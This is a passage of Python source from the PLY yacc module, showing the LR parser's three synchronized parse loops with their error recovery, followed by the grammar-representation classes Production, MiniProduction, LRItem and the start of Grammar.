        self.productions = lrtab.lr_productions   # production list
        self.action = lrtab.lr_action             # action table: state -> {token: action}
        self.goto = lrtab.lr_goto                 # goto table: state -> {nonterminal: state}
        self.errorfunc = errorf                   # user p_error() callback (may be None)

    def errok(self):
        # Called from within p_error() to signal that recovery succeeded
        self.errorok = 1

    def restart(self):
        # Reset both stacks to the initial (state 0, $end) configuration
        del self.statestack[:]
        del self.symstack[:]
        sym = YaccSymbol()
        sym.type = '$end'
        self.symstack.append(sym)
        self.statestack.append(0)

    def parse(self,input=None,lexer=None,debug=0,tracking=0,tokenfunc=None):
        """Dispatch to one of three specialized parse loops.

        debug/yaccdevel -> parsedebug (full tracing);
        tracking        -> parseopt (position tracking, no tracing);
        otherwise       -> parseopt_notrack (fastest path).
        """
        if debug or yaccdevel:
            if isinstance(debug,int):
                # A truthy int means "debug on" but no logger supplied
                debug = PlyLogger(sys.stderr)
            return self.parsedebug(input,lexer,debug,tracking,tokenfunc)
        elif tracking:
            return self.parseopt(input,lexer,debug,tracking,tokenfunc)
        else:
            return self.parseopt_notrack(input,lexer,debug,tracking,tokenfunc)

    # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    # parsedebug().
    #
    # This is the debugging enabled version of parse().
    # All changes made to the
    # parsing engine should be made here.   For the non-debugging version,
    # copy this code to a method parseopt() and delete all of the sections
    # enclosed in:
    #
    #      #--! DEBUG
    #      statements
    #      #--! DEBUG
    #
    # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

    def parsedebug(self,input=None,lexer=None,debug=None,tracking=0,tokenfunc=None):
        """Reference parse loop with full debug tracing via `debug` logger.

        Master copy of the engine: parseopt() and parseopt_notrack() are
        hand-stripped duplicates of this method.
        """
        lookahead = None                 # Current lookahead symbol
        lookaheadstack = [ ]             # Stack of lookahead symbols
        actions = self.action            # Local reference to action table (to avoid lookup on self.)
        goto    = self.goto              # Local reference to goto table (to avoid lookup on self.)
        prod    = self.productions       # Local reference to production list (to avoid lookup on self.)
        pslice  = YaccProduction(None)   # Production object passed to grammar rules
        errorcount = 0                   # Used during error recovery

        # --! DEBUG
        debug.info("PLY: PARSE DEBUG START")
        # --! DEBUG

        # If no lexer was given, we will try to use the lex module
        if not lexer:
            lex = load_ply_lex()
            lexer = lex.lexer

        # Set up the lexer and parser objects on pslice
        pslice.lexer = lexer
        pslice.parser = self

        # If input was supplied, pass to lexer
        if input is not None:
            lexer.input(input)

        if tokenfunc is None:
            # Tokenize function
            get_token = lexer.token
        else:
            get_token = tokenfunc

        # Set up the state and symbol stacks
        statestack = [ ]                # Stack of parsing states
        self.statestack = statestack
        symstack   = [ ]                # Stack of grammar symbols
        self.symstack = symstack

        pslice.stack = symstack         # Put in the production
        errtoken   = None               # Err token

        # The start state is assumed to be (0,$end)
        statestack.append(0)
        sym = YaccSymbol()
        sym.type = "$end"
        symstack.append(sym)
        state = 0
        while 1:
            # Get the next symbol on the input.  If a lookahead symbol
            # is already set, we just use that. Otherwise, we'll pull
            # the next token off of the lookaheadstack or from the lexer

            # --! DEBUG
            debug.debug('')
            debug.debug('State  : %s', state)
            # --! DEBUG

            if not lookahead:
                if not lookaheadstack:
                    lookahead = get_token()     # Get the next token
                else:
                    lookahead = lookaheadstack.pop()
                if not lookahead:
                    lookahead = YaccSymbol()
                    lookahead.type = "$end"

            # --! DEBUG
            debug.debug('Stack  : %s',
                        ("%s . %s" % (" ".join([xx.type for xx in symstack][1:]), str(lookahead))).lstrip())
            # --! DEBUG

            # Check the action table
            ltype = lookahead.type
            t = actions[state].get(ltype)

            if t is not None:
                if t > 0:
                    # shift a symbol on the stack
                    statestack.append(t)
                    state = t

                    # --! DEBUG
                    debug.debug("Action : Shift and goto state %s", t)
                    # --! DEBUG

                    symstack.append(lookahead)
                    lookahead = None

                    # Decrease error count on successful shift
                    if errorcount: errorcount -=1
                    continue

                if t < 0:
                    # reduce a symbol on the stack, emit a production
                    p = prod[-t]
                    pname = p.name
                    plen  = p.len

                    # Get production function
                    sym = YaccSymbol()
                    sym.type = pname       # Production name
                    sym.value = None

                    # --! DEBUG
                    if plen:
                        debug.info("Action : Reduce rule [%s] with %s and goto state %d", p.str, "["+",".join([format_stack_entry(_v.value) for _v in symstack[-plen:]])+"]",-t)
                    else:
                        debug.info("Action : Reduce rule [%s] with %s and goto state %d", p.str, [],-t)
                    # --! DEBUG

                    if plen:
                        # Non-empty production: slice off the RHS symbols
                        targ = symstack[-plen-1:]
                        targ[0] = sym

                        # --! TRACKING
                        if tracking:
                            # Span of the new symbol = first RHS start .. last RHS end
                            t1 = targ[1]
                            sym.lineno = t1.lineno
                            sym.lexpos = t1.lexpos
                            t1 = targ[-1]
                            sym.endlineno = getattr(t1,"endlineno",t1.lineno)
                            sym.endlexpos = getattr(t1,"endlexpos",t1.lexpos)
                        # --! TRACKING

                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                        # The code enclosed in this section is duplicated
                        # below as a performance optimization.  Make sure
                        # changes get made in both locations.

                        pslice.slice = targ

                        try:
                            # Call the grammar rule with our special slice object
                            del symstack[-plen:]
                            del statestack[-plen:]
                            p.callable(pslice)
                            # --! DEBUG
                            debug.info("Result : %s", format_result(pslice[0]))
                            # --! DEBUG
                            symstack.append(sym)
                            state = goto[statestack[-1]][pname]
                            statestack.append(state)
                        except SyntaxError:
                            # If an error was set. Enter error recovery state
                            lookaheadstack.append(lookahead)
                            symstack.pop()
                            statestack.pop()
                            state = statestack[-1]
                            sym.type = 'error'
                            lookahead = sym
                            errorcount = error_count
                            self.errorok = 0
                        continue
                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

                    else:
                        # Empty production: nothing to pop off the stacks

                        # --! TRACKING
                        if tracking:
                            sym.lineno = lexer.lineno
                            sym.lexpos = lexer.lexpos
                        # --! TRACKING

                        targ = [ sym ]

                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                        # The code enclosed in this section is duplicated
                        # above as a performance optimization.  Make sure
                        # changes get made in both locations.

                        pslice.slice = targ

                        try:
                            # Call the grammar rule with our special slice object
                            p.callable(pslice)
                            # --! DEBUG
                            debug.info("Result : %s", format_result(pslice[0]))
                            # --! DEBUG
                            symstack.append(sym)
                            state = goto[statestack[-1]][pname]
                            statestack.append(state)
                        except SyntaxError:
                            # If an error was set. Enter error recovery state
                            lookaheadstack.append(lookahead)
                            symstack.pop()
                            statestack.pop()
                            state = statestack[-1]
                            sym.type = 'error'
                            lookahead = sym
                            errorcount = error_count
                            self.errorok = 0
                        continue
                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

                if t == 0:
                    # Accept: the value of the start symbol is the parse result
                    n = symstack[-1]
                    result = getattr(n,"value",None)
                    # --! DEBUG
                    debug.info("Done   : Returning %s", format_result(result))
                    debug.info("PLY: PARSE DEBUG END")
                    # --! DEBUG
                    return result

            if t == None:
                # NOTE(review): `t == None` kept as-is; `t is None` would be
                # the idiomatic form but this file is a hand-synced triplicate.

                # --! DEBUG
                debug.error('Error  : %s',
                            ("%s . %s" % (" ".join([xx.type for xx in symstack][1:]), str(lookahead))).lstrip())
                # --! DEBUG

                # We have some kind of parsing error here.  To handle
                # this, we are going to push the current token onto
                # the tokenstack and replace it with an 'error' token.
                # If there are any synchronization rules, they may
                # catch it.
                #
                # In addition to pushing the error token, we call call
                # the user defined p_error() function if this is the
                # first syntax error.  This function is only called if
                # errorcount == 0.
                if errorcount == 0 or self.errorok:
                    errorcount = error_count
                    self.errorok = 0
                    errtoken = lookahead
                    if errtoken.type == "$end":
                        errtoken = None               # End of file!
                    if self.errorfunc:
                        # Expose errok/token/restart as module globals so the
                        # user's p_error() can call them without a parser ref.
                        global errok,token,restart
                        errok = self.errok        # Set some special functions available in error recovery
                        token = get_token
                        restart = self.restart

                        if errtoken and not hasattr(errtoken,'lexer'):
                            errtoken.lexer = lexer
                        tok = self.errorfunc(errtoken)
                        del errok, token, restart   # Delete special functions

                        if self.errorok:
                            # User must have done some kind of panic
                            # mode recovery on their own.  The
                            # returned token is the next lookahead
                            lookahead = tok
                            errtoken = None
                            continue
                    else:
                        if errtoken:
                            if hasattr(errtoken,"lineno"): lineno = lookahead.lineno
                            else: lineno = 0
                            if lineno:
                                sys.stderr.write("yacc: Syntax error at line %d, token=%s\n" % (lineno, errtoken.type))
                            else:
                                sys.stderr.write("yacc: Syntax error, token=%s" % errtoken.type)
                        else:
                            sys.stderr.write("yacc: Parse error in input. EOF\n")
                        return

                else:
                    errorcount = error_count

                # case 1:  the statestack only has 1 entry on it.  If we're in this state, the
                # entire parse has been rolled back and we're completely hosed.   The token is
                # discarded and we just keep going.
                if len(statestack) <= 1 and lookahead.type != "$end":
                    lookahead = None
                    errtoken = None
                    state = 0
                    # Nuke the pushback stack
                    del lookaheadstack[:]
                    continue

                # case 2: the statestack has a couple of entries on it, but we're
                # at the end of the file. nuke the top entry and generate an error token

                # Start nuking entries on the stack
                if lookahead.type == "$end":
                    # Whoa. We're really hosed here. Bail out
                    return

                if lookahead.type != 'error':
                    sym = symstack[-1]
                    if sym.type == 'error':
                        # Hmmm. Error is on top of stack, we'll just nuke input
                        # symbol and continue
                        lookahead = None
                        continue
                    # Wrap the offending token in an 'error' symbol and push
                    # the original back so synchronization rules can match.
                    t = YaccSymbol()
                    t.type = 'error'
                    if hasattr(lookahead,"lineno"):
                        t.lineno = lookahead.lineno
                    t.value = lookahead
                    lookaheadstack.append(lookahead)
                    lookahead = t
                else:
                    symstack.pop()
                    statestack.pop()
                    state = statestack[-1]       # Potential bug fix

                continue

            # Call an error function here
            raise RuntimeError("yacc: internal parser error!!!\n")

    # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    # parseopt().
    #
    # Optimized version of parse() method.  DO NOT EDIT THIS CODE DIRECTLY.
    # Edit the debug version above, then copy any modifications to the method
    # below while removing #--! DEBUG sections.
    # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

    def parseopt(self,input=None,lexer=None,debug=0,tracking=0,tokenfunc=None):
        """Optimized parse loop: position tracking kept, debug tracing removed."""
        lookahead = None                 # Current lookahead symbol
        lookaheadstack = [ ]             # Stack of lookahead symbols
        actions = self.action            # Local reference to action table (to avoid lookup on self.)
        goto    = self.goto              # Local reference to goto table (to avoid lookup on self.)
        prod    = self.productions       # Local reference to production list (to avoid lookup on self.)
        pslice  = YaccProduction(None)   # Production object passed to grammar rules
        errorcount = 0                   # Used during error recovery

        # If no lexer was given, we will try to use the lex module
        if not lexer:
            lex = load_ply_lex()
            lexer = lex.lexer

        # Set up the lexer and parser objects on pslice
        pslice.lexer = lexer
        pslice.parser = self

        # If input was supplied, pass to lexer
        if input is not None:
            lexer.input(input)

        if tokenfunc is None:
            # Tokenize function
            get_token = lexer.token
        else:
            get_token = tokenfunc

        # Set up the state and symbol stacks
        statestack = [ ]                # Stack of parsing states
        self.statestack = statestack
        symstack   = [ ]                # Stack of grammar symbols
        self.symstack = symstack

        pslice.stack = symstack         # Put in the production
        errtoken   = None               # Err token

        # The start state is assumed to be (0,$end)
        statestack.append(0)
        sym = YaccSymbol()
        sym.type = '$end'
        symstack.append(sym)
        state = 0
        while 1:
            # Get the next symbol on the input.  If a lookahead symbol
            # is already set, we just use that. Otherwise, we'll pull
            # the next token off of the lookaheadstack or from the lexer

            if not lookahead:
                if not lookaheadstack:
                    lookahead = get_token()     # Get the next token
                else:
                    lookahead = lookaheadstack.pop()
                if not lookahead:
                    lookahead = YaccSymbol()
                    lookahead.type = '$end'

            # Check the action table
            ltype = lookahead.type
            t = actions[state].get(ltype)

            if t is not None:
                if t > 0:
                    # shift a symbol on the stack
                    statestack.append(t)
                    state = t

                    symstack.append(lookahead)
                    lookahead = None

                    # Decrease error count on successful shift
                    if errorcount: errorcount -=1
                    continue

                if t < 0:
                    # reduce a symbol on the stack, emit a production
                    p = prod[-t]
                    pname = p.name
                    plen  = p.len

                    # Get production function
                    sym = YaccSymbol()
                    sym.type = pname       # Production name
                    sym.value = None

                    if plen:
                        # Non-empty production: slice off the RHS symbols
                        targ = symstack[-plen-1:]
                        targ[0] = sym

                        # --! TRACKING
                        if tracking:
                            # Span of the new symbol = first RHS start .. last RHS end
                            t1 = targ[1]
                            sym.lineno = t1.lineno
                            sym.lexpos = t1.lexpos
                            t1 = targ[-1]
                            sym.endlineno = getattr(t1,"endlineno",t1.lineno)
                            sym.endlexpos = getattr(t1,"endlexpos",t1.lexpos)
                        # --! TRACKING

                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                        # The code enclosed in this section is duplicated
                        # below as a performance optimization.  Make sure
                        # changes get made in both locations.

                        pslice.slice = targ

                        try:
                            # Call the grammar rule with our special slice object
                            del symstack[-plen:]
                            del statestack[-plen:]
                            p.callable(pslice)
                            symstack.append(sym)
                            state = goto[statestack[-1]][pname]
                            statestack.append(state)
                        except SyntaxError:
                            # If an error was set. Enter error recovery state
                            lookaheadstack.append(lookahead)
                            symstack.pop()
                            statestack.pop()
                            state = statestack[-1]
                            sym.type = 'error'
                            lookahead = sym
                            errorcount = error_count
                            self.errorok = 0
                        continue
                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

                    else:
                        # Empty production: nothing to pop off the stacks

                        # --! TRACKING
                        if tracking:
                            sym.lineno = lexer.lineno
                            sym.lexpos = lexer.lexpos
                        # --! TRACKING

                        targ = [ sym ]

                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                        # The code enclosed in this section is duplicated
                        # above as a performance optimization.  Make sure
                        # changes get made in both locations.

                        pslice.slice = targ

                        try:
                            # Call the grammar rule with our special slice object
                            p.callable(pslice)
                            symstack.append(sym)
                            state = goto[statestack[-1]][pname]
                            statestack.append(state)
                        except SyntaxError:
                            # If an error was set. Enter error recovery state
                            lookaheadstack.append(lookahead)
                            symstack.pop()
                            statestack.pop()
                            state = statestack[-1]
                            sym.type = 'error'
                            lookahead = sym
                            errorcount = error_count
                            self.errorok = 0
                        continue
                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

                if t == 0:
                    # Accept: the value of the start symbol is the parse result
                    n = symstack[-1]
                    return getattr(n,"value",None)

            if t == None:
                # NOTE(review): `t == None` kept as-is to stay in sync with
                # parsedebug(); see the DO NOT EDIT banner above.

                # We have some kind of parsing error here.  To handle
                # this, we are going to push the current token onto
                # the tokenstack and replace it with an 'error' token.
                # If there are any synchronization rules, they may
                # catch it.
                #
                # In addition to pushing the error token, we call call
                # the user defined p_error() function if this is the
                # first syntax error.  This function is only called if
                # errorcount == 0.
                if errorcount == 0 or self.errorok:
                    errorcount = error_count
                    self.errorok = 0
                    errtoken = lookahead
                    if errtoken.type == '$end':
                        errtoken = None               # End of file!
                    if self.errorfunc:
                        # Expose errok/token/restart as module globals so the
                        # user's p_error() can call them without a parser ref.
                        global errok,token,restart
                        errok = self.errok        # Set some special functions available in error recovery
                        token = get_token
                        restart = self.restart

                        if errtoken and not hasattr(errtoken,'lexer'):
                            errtoken.lexer = lexer
                        tok = self.errorfunc(errtoken)
                        del errok, token, restart   # Delete special functions

                        if self.errorok:
                            # User must have done some kind of panic
                            # mode recovery on their own.  The
                            # returned token is the next lookahead
                            lookahead = tok
                            errtoken = None
                            continue
                    else:
                        if errtoken:
                            if hasattr(errtoken,"lineno"): lineno = lookahead.lineno
                            else: lineno = 0
                            if lineno:
                                sys.stderr.write("yacc: Syntax error at line %d, token=%s\n" % (lineno, errtoken.type))
                            else:
                                sys.stderr.write("yacc: Syntax error, token=%s" % errtoken.type)
                        else:
                            sys.stderr.write("yacc: Parse error in input. EOF\n")
                        return

                else:
                    errorcount = error_count

                # case 1:  the statestack only has 1 entry on it.  If we're in this state, the
                # entire parse has been rolled back and we're completely hosed.   The token is
                # discarded and we just keep going.
                if len(statestack) <= 1 and lookahead.type != '$end':
                    lookahead = None
                    errtoken = None
                    state = 0
                    # Nuke the pushback stack
                    del lookaheadstack[:]
                    continue

                # case 2: the statestack has a couple of entries on it, but we're
                # at the end of the file. nuke the top entry and generate an error token

                # Start nuking entries on the stack
                if lookahead.type == '$end':
                    # Whoa. We're really hosed here. Bail out
                    return

                if lookahead.type != 'error':
                    sym = symstack[-1]
                    if sym.type == 'error':
                        # Hmmm. Error is on top of stack, we'll just nuke input
                        # symbol and continue
                        lookahead = None
                        continue
                    # Wrap the offending token in an 'error' symbol and push
                    # the original back so synchronization rules can match.
                    t = YaccSymbol()
                    t.type = 'error'
                    if hasattr(lookahead,"lineno"):
                        t.lineno = lookahead.lineno
                    t.value = lookahead
                    lookaheadstack.append(lookahead)
                    lookahead = t
                else:
                    symstack.pop()
                    statestack.pop()
                    state = statestack[-1]       # Potential bug fix

                continue

            # Call an error function here
            raise RuntimeError("yacc: internal parser error!!!\n")

    # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    # parseopt_notrack().
    #
    # Optimized version of parseopt() with line number tracking removed.
    # DO NOT EDIT THIS CODE DIRECTLY. Copy the optimized version and remove
    # code in the #--! TRACKING sections
    # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

    def parseopt_notrack(self,input=None,lexer=None,debug=0,tracking=0,tokenfunc=None):
        """Fastest parse loop: no debug tracing and no position tracking."""
        lookahead = None                 # Current lookahead symbol
        lookaheadstack = [ ]             # Stack of lookahead symbols
        actions = self.action            # Local reference to action table (to avoid lookup on self.)
        goto    = self.goto              # Local reference to goto table (to avoid lookup on self.)
        prod    = self.productions       # Local reference to production list (to avoid lookup on self.)
        pslice  = YaccProduction(None)   # Production object passed to grammar rules
        errorcount = 0                   # Used during error recovery

        # If no lexer was given, we will try to use the lex module
        if not lexer:
            lex = load_ply_lex()
            lexer = lex.lexer

        # Set up the lexer and parser objects on pslice
        pslice.lexer = lexer
        pslice.parser = self

        # If input was supplied, pass to lexer
        if input is not None:
            lexer.input(input)

        if tokenfunc is None:
            # Tokenize function
            get_token = lexer.token
        else:
            get_token = tokenfunc

        # Set up the state and symbol stacks
        statestack = [ ]                # Stack of parsing states
        self.statestack = statestack
        symstack   = [ ]                # Stack of grammar symbols
        self.symstack = symstack

        pslice.stack = symstack         # Put in the production
        errtoken   = None               # Err token

        # The start state is assumed to be (0,$end)
        statestack.append(0)
        sym = YaccSymbol()
        sym.type = '$end'
        symstack.append(sym)
        state = 0
        while 1:
            # Get the next symbol on the input.  If a lookahead symbol
            # is already set, we just use that. Otherwise, we'll pull
            # the next token off of the lookaheadstack or from the lexer

            if not lookahead:
                if not lookaheadstack:
                    lookahead = get_token()     # Get the next token
                else:
                    lookahead = lookaheadstack.pop()
                if not lookahead:
                    lookahead = YaccSymbol()
                    lookahead.type = '$end'

            # Check the action table
            ltype = lookahead.type
            t = actions[state].get(ltype)

            if t is not None:
                if t > 0:
                    # shift a symbol on the stack
                    statestack.append(t)
                    state = t

                    symstack.append(lookahead)
                    lookahead = None

                    # Decrease error count on successful shift
                    if errorcount: errorcount -=1
                    continue

                if t < 0:
                    # reduce a symbol on the stack, emit a production
                    p = prod[-t]
                    pname = p.name
                    plen  = p.len

                    # Get production function
                    sym = YaccSymbol()
                    sym.type = pname       # Production name
                    sym.value = None

                    if plen:
                        # Non-empty production: slice off the RHS symbols
                        targ = symstack[-plen-1:]
                        targ[0] = sym

                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                        # The code enclosed in this section is duplicated
                        # below as a performance optimization.  Make sure
                        # changes get made in both locations.

                        pslice.slice = targ

                        try:
                            # Call the grammar rule with our special slice object
                            del symstack[-plen:]
                            del statestack[-plen:]
                            p.callable(pslice)
                            symstack.append(sym)
                            state = goto[statestack[-1]][pname]
                            statestack.append(state)
                        except SyntaxError:
                            # If an error was set. Enter error recovery state
                            lookaheadstack.append(lookahead)
                            symstack.pop()
                            statestack.pop()
                            state = statestack[-1]
                            sym.type = 'error'
                            lookahead = sym
                            errorcount = error_count
                            self.errorok = 0
                        continue
                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

                    else:
                        # Empty production: nothing to pop off the stacks
                        targ = [ sym ]

                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                        # The code enclosed in this section is duplicated
                        # above as a performance optimization.  Make sure
                        # changes get made in both locations.

                        pslice.slice = targ

                        try:
                            # Call the grammar rule with our special slice object
                            p.callable(pslice)
                            symstack.append(sym)
                            state = goto[statestack[-1]][pname]
                            statestack.append(state)
                        except SyntaxError:
                            # If an error was set. Enter error recovery state
                            lookaheadstack.append(lookahead)
                            symstack.pop()
                            statestack.pop()
                            state = statestack[-1]
                            sym.type = 'error'
                            lookahead = sym
                            errorcount = error_count
                            self.errorok = 0
                        continue
                        # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

                if t == 0:
                    # Accept: the value of the start symbol is the parse result
                    n = symstack[-1]
                    return getattr(n,"value",None)

            if t == None:
                # NOTE(review): `t == None` kept as-is to stay in sync with
                # parsedebug(); see the DO NOT EDIT banner above.

                # We have some kind of parsing error here.  To handle
                # this, we are going to push the current token onto
                # the tokenstack and replace it with an 'error' token.
                # If there are any synchronization rules, they may
                # catch it.
                #
                # In addition to pushing the error token, we call call
                # the user defined p_error() function if this is the
                # first syntax error.  This function is only called if
                # errorcount == 0.
                if errorcount == 0 or self.errorok:
                    errorcount = error_count
                    self.errorok = 0
                    errtoken = lookahead
                    if errtoken.type == '$end':
                        errtoken = None               # End of file!
                    if self.errorfunc:
                        # Expose errok/token/restart as module globals so the
                        # user's p_error() can call them without a parser ref.
                        global errok,token,restart
                        errok = self.errok        # Set some special functions available in error recovery
                        token = get_token
                        restart = self.restart

                        if errtoken and not hasattr(errtoken,'lexer'):
                            errtoken.lexer = lexer
                        tok = self.errorfunc(errtoken)
                        del errok, token, restart   # Delete special functions

                        if self.errorok:
                            # User must have done some kind of panic
                            # mode recovery on their own.  The
                            # returned token is the next lookahead
                            lookahead = tok
                            errtoken = None
                            continue
                    else:
                        if errtoken:
                            if hasattr(errtoken,"lineno"): lineno = lookahead.lineno
                            else: lineno = 0
                            if lineno:
                                sys.stderr.write("yacc: Syntax error at line %d, token=%s\n" % (lineno, errtoken.type))
                            else:
                                sys.stderr.write("yacc: Syntax error, token=%s" % errtoken.type)
                        else:
                            sys.stderr.write("yacc: Parse error in input. EOF\n")
                        return

                else:
                    errorcount = error_count

                # case 1:  the statestack only has 1 entry on it.  If we're in this state, the
                # entire parse has been rolled back and we're completely hosed.   The token is
                # discarded and we just keep going.
                if len(statestack) <= 1 and lookahead.type != '$end':
                    lookahead = None
                    errtoken = None
                    state = 0
                    # Nuke the pushback stack
                    del lookaheadstack[:]
                    continue

                # case 2: the statestack has a couple of entries on it, but we're
                # at the end of the file. nuke the top entry and generate an error token

                # Start nuking entries on the stack
                if lookahead.type == '$end':
                    # Whoa. We're really hosed here. Bail out
                    return

                if lookahead.type != 'error':
                    sym = symstack[-1]
                    if sym.type == 'error':
                        # Hmmm. Error is on top of stack, we'll just nuke input
                        # symbol and continue
                        lookahead = None
                        continue
                    # Wrap the offending token in an 'error' symbol and push
                    # the original back so synchronization rules can match.
                    t = YaccSymbol()
                    t.type = 'error'
                    if hasattr(lookahead,"lineno"):
                        t.lineno = lookahead.lineno
                    t.value = lookahead
                    lookaheadstack.append(lookahead)
                    lookahead = t
                else:
                    symstack.pop()
                    statestack.pop()
                    state = statestack[-1]       # Potential bug fix

                continue

            # Call an error function here
            raise RuntimeError("yacc: internal parser error!!!\n")

# -----------------------------------------------------------------------------
#                          === Grammar Representation ===
#
# The following functions, classes, and variables are used to represent and
# manipulate the rules that make up a grammar.
# -----------------------------------------------------------------------------

import re

# regex matching identifiers
_is_identifier = re.compile(r'^[a-zA-Z0-9_-]+$')

# -----------------------------------------------------------------------------
# class Production:
#
# This class stores the raw information about a single production or grammar rule.
# A grammar rule refers to a specification such as this:
#
#       expr : expr PLUS term
#
# Here are the basic attributes defined on all productions
#
#       name     - Name of the production.  For example 'expr'
#       prod     - A list of symbols on the right side ['expr','PLUS','term']
#       prec     - Production precedence level
#       number   - Production number.
#       func     - Function that executes on reduce
#       file     - File where production function is defined
#       lineno   - Line number where production function is defined
#
# The following attributes are defined or optional.
#
#       len       - Length of the production (number of symbols on right hand side)
#       usyms     - Set of unique symbols found in the production
# -----------------------------------------------------------------------------

class Production(object):
    """Raw information about one grammar rule (e.g. ``expr : expr PLUS term``)."""

    # Number of times this production has participated in a reduce action
    reduced = 0

    def __init__(self,number,name,prod,precedence=('right',0),func=None,file='',line=0):
        self.name     = name
        self.prod     = tuple(prod)
        self.number   = number
        self.func     = func
        self.callable = None
        self.file     = file
        self.line     = line
        self.prec     = precedence

        # Number of symbols on the right-hand side
        self.len = len(self.prod)

        # Unique RHS symbols, first-occurrence order preserved
        unique = []
        for symbol in self.prod:
            if symbol not in unique:
                unique.append(symbol)
        self.usyms = unique

        # All LR items for this production (filled in during table build)
        self.lr_items = []
        self.lr_next  = None

        # Human-readable form, e.g. "expr -> expr PLUS term"
        if self.prod:
            rhs = " ".join(self.prod)
        else:
            rhs = "<empty>"
        self.str = "%s -> %s" % (self.name, rhs)

    def __str__(self):
        return self.str

    def __repr__(self):
        return "Production(" + str(self) + ")"

    def __len__(self):
        return len(self.prod)

    def __nonzero__(self):
        # Python 2 truth protocol: productions are always truthy
        return 1

    def __getitem__(self,index):
        return self.prod[index]

    def lr_item(self,n):
        """Return the LR item with the dot at position n, or None past the end."""
        if n > len(self.prod):
            return None
        item = LRItem(self,n)

        # Precompute the productions that can follow the dot.
        # HACK (as in upstream PLY): to be removed later.
        try:
            item.lr_after = Prodnames[item.prod[n+1]]
        except (IndexError,KeyError):
            item.lr_after = []
        try:
            item.lr_before = item.prod[n-1]
        except IndexError:
            item.lr_before = None

        return item

    def bind(self,pdict):
        """Resolve the stored function name to a callable via pdict."""
        if self.func:
            self.callable = pdict[self.func]

# This class serves as a minimal standin for Production objects when
# reading table data from files.   It only contains information
# actually used by the LR parsing engine, plus some additional
# debugging information.
class MiniProduction(object):
    """Lightweight stand-in for Production when tables are loaded from a
    file: carries only what the LR engine itself needs."""
    def __init__(self,str,name,len,func,file,line):
        self.name = name
        self.len = len
        self.func = func
        self.callable = None          # Bound later by bind()
        self.file = file
        self.line = line
        self.str = str
    def __str__(self):
        return self.str
    def __repr__(self):
        return "MiniProduction(%s)" % self.str

    # Bind the production function name to a callable
    def bind(self,pdict):
        if self.func:
            self.callable = pdict[self.func]

# -----------------------------------------------------------------------------
# class LRItem
#
# This class represents a specific stage of parsing a production rule.  For
# example:
#
#       expr : expr . PLUS term
#
# In the above, the "." represents the current location of the parse.  Here
# basic attributes:
#
#       name       - Name of the production.  For example 'expr'
#       prod       - A list of symbols on the right side ['expr','.', 'PLUS','term']
#       number     - Production number.
#
#       lr_next      Next LR item. Example, if we are ' expr -> expr . PLUS term'
#                    then lr_next refers to 'expr -> expr PLUS . term'
#       lr_index   - LR item index (location of the ".") in the prod list.
#       lookaheads - LALR lookahead symbols for this item
#       len        - Length of the production (number of symbols on right hand side)
#       lr_after    - List of all productions that immediately follow
#       lr_before   - Grammar symbol immediately before
# -----------------------------------------------------------------------------

class LRItem(object):
    def __init__(self,p,n):
        # p is the underlying Production; n is the dot position.
        self.name = p.name
        self.prod = list(p.prod)
        self.number = p.number
        self.lr_index = n
        self.lookaheads = { }
        self.prod.insert(n,".")     # Insert the dot marker at position n
        self.prod = tuple(self.prod)
        self.len = len(self.prod)
        self.usyms = p.usyms

    def __str__(self):
        if self.prod:
            s = "%s -> %s" % (self.name," ".join(self.prod))
        else:
            s = "%s -> <empty>" % self.name
        return s

    def __repr__(self):
        return "LRItem("+str(self)+")"

# -----------------------------------------------------------------------------
# rightmost_terminal()
#
# Return the rightmost terminal from a list of symbols.  Used in add_production()
# -----------------------------------------------------------------------------
def rightmost_terminal(symbols, terminals):
    """Scan symbols right-to-left and return the first member of terminals,
    or None if the right-hand side contains no terminal at all."""
    i = len(symbols) - 1
    while i >= 0:
        if symbols[i] in terminals:
            return symbols[i]
        i -= 1
    return None

# -----------------------------------------------------------------------------
#                           === GRAMMAR CLASS ===
#
# The following class represents the contents of the specified grammar along
# with various computed properties such as first sets, follow sets, LR items, etc.
# This data is used for critical parts of the table generation process later.
# -----------------------------------------------------------------------------

class GrammarError(YaccError): pass

class Grammar(object):
    def __init__(self,terminals):
        self.Productions = [None]  # A list of all of the productions.  The first
                                   # entry is always reserved for the purpose of
                                   # building an augmented grammar

        self.Prodnames = { }       # A dictionary mapping the names of nonterminals to a list of all
                                   # productions of that nonterminal.

        self.Prodmap = { }         # A dictionary that is only used to detect duplicate
                                   # productions.

        self.Terminals = { }       # A dictionary mapping the names of terminal symbols to a
                                   # list of the rules where they are used.

        for term in terminals:
            self.Terminals[term] = []
